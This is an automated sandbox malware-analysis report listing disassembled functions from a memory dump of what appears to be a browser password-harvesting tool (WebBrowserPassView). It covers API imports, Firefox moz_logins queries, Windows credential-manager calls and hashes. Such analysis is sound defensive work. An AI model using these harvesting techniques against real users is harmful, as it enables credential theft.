                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  • API String ID: 3037099051-517860148
                                                  • Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                  • Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
                                                  • Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                  • Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004038C4, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                  • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                  • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                  • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                  • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                  • API String ID: 2238633743-1621422469
                                                  • Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                  • Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
                                                  • Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                  • Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410D5D, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00410DED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-70141382
                                                  • Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                  • Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
                                                  • Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                  • Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E191, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2081463915-1959339147
                                                  • Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                  • Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
                                                  • Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                  • Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410CD9, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                  • Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
                                                  • Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                  • Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004037C3, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                  • API String ID: 2449869053-4258758744
                                                  • Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                  • Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
                                                  • Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                  • Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004033DF, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  • memset.MSVCRT ref: 00403415
                                                  • memset.MSVCRT ref: 0040342A
                                                  • memset.MSVCRT ref: 0040343F
                                                  • _snwprintf.MSVCRT ref: 00403467
                                                  • wcscpy.MSVCRT ref: 00403483
                                                  • _snwprintf.MSVCRT ref: 004034C6
                                                  Strings
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
                                                  • WebBrowserPassView, xrefs: 004034AB
                                                  • <table dir="rtl"><tr><td>, xrefs: 0040347D
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
                                                  • API String ID: 2731979376-1376879643
                                                  • Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                  • Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
                                                  • Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                  • Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040DE35, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetBkMode.GDI32(?,00000001), ref: 0040DE90
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
                                                  • SelectObject.GDI32(?,?), ref: 0040DEB3
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
                                                  • SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
                                                  • SetCursor.USER32(00000000), ref: 0040DF1E
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
                                                  • String ID: WebBrowserPassView
                                                  • API String ID: 101102110-2171583229
                                                  • Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                  • Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
                                                  • Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                  • Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040931D, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D
                                                    • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D
                                                    • Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
                                                    • Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD
                                                  • memcpy.MSVCRT ref: 004093B4
                                                  • strchr.MSVCRT ref: 004093D9
                                                  • strchr.MSVCRT ref: 004093EA
                                                  • _strlwr.MSVCRT ref: 004093F8
                                                  • memset.MSVCRT ref: 00409413
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409460
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                  • Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
                                                  • Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                  • Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411C63, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                  • Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
                                                  • Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                  • Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410DF5, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00410E0E
                                                  • wcscpy.MSVCRT ref: 00410E1E
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                    • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                  • wcscpy.MSVCRT ref: 00410E6D
                                                  • wcscat.MSVCRT ref: 00410E78
                                                  • memset.MSVCRT ref: 00410E54
                                                    • Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
                                                    • Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749
                                                  • memset.MSVCRT ref: 00410E9C
                                                  • memcpy.MSVCRT ref: 00410EB7
                                                  • wcscat.MSVCRT ref: 00410EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                  • Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
                                                  • Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                  • Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040697E, Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 187stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
                                                    • Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
                                                    • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
                                                    • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
                                                    • Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                    • Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                    • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                    • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                  • memset.MSVCRT ref: 004069BD
                                                    • Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9
                                                  • memset.MSVCRT ref: 00406A3C
                                                  • memset.MSVCRT ref: 00406A51
                                                  • strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
                                                  • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
                                                  • memset.MSVCRT ref: 00406B48
                                                  Strings
                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                                  • API String ID: 2096775815-1740008135
                                                  • Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                  • Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
                                                  • Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                  • Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415EAF, Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                  • malloc.MSVCRT ref: 00415EE6
                                                  • free.MSVCRT(?), ref: 00415EF6
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
                                                  • free.MSVCRT(?), ref: 00415F0F
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
                                                  • malloc.MSVCRT ref: 00415F2D
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
                                                  • free.MSVCRT(?), ref: 00415F45
                                                  • free.MSVCRT(?), ref: 00415F59
                                                  • free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$FullNamePath$malloc$Version
                                                  • String ID:
                                                  • API String ID: 3356672799-0
                                                  • Opcode ID: 61acd55b7f6f74b1de7cfca591009593a893279d718121bcb2ed6df4730cb7d0
                                                  • Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
                                                  • Opcode Fuzzy Hash: 61acd55b7f6f74b1de7cfca591009593a893279d718121bcb2ed6df4730cb7d0
                                                  • Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407363, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 0040736D
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                  • GlobalLock.KERNEL32 ref: 004073A8
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                  • SetClipboardData.USER32 ref: 004073D6
                                                  • GetLastError.KERNEL32 ref: 004073DE
                                                  • CloseHandle.KERNEL32(?), ref: 004073EA
                                                  • GetLastError.KERNEL32 ref: 004073F5
                                                  • CloseClipboard.USER32 ref: 004073FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                  • String ID:
                                                  • API String ID: 3604893535-0
                                                  • Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                  • Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
                                                  • Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                  • Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004121F2, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                  • Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
                                                  • Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                  • Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A16C, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                  • Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
                                                  • Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                  • Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403926, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                  • #17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                  • Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
                                                  • Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                  • Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FABA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
                                                  • GetModuleHandleW.KERNEL32(sqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
                                                  • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
                                                  • FreeLibrary.KERNEL32(00000000,?,74B057F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHandleLibraryModule
                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                  • API String ID: 662261464-3550686275
                                                  • Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
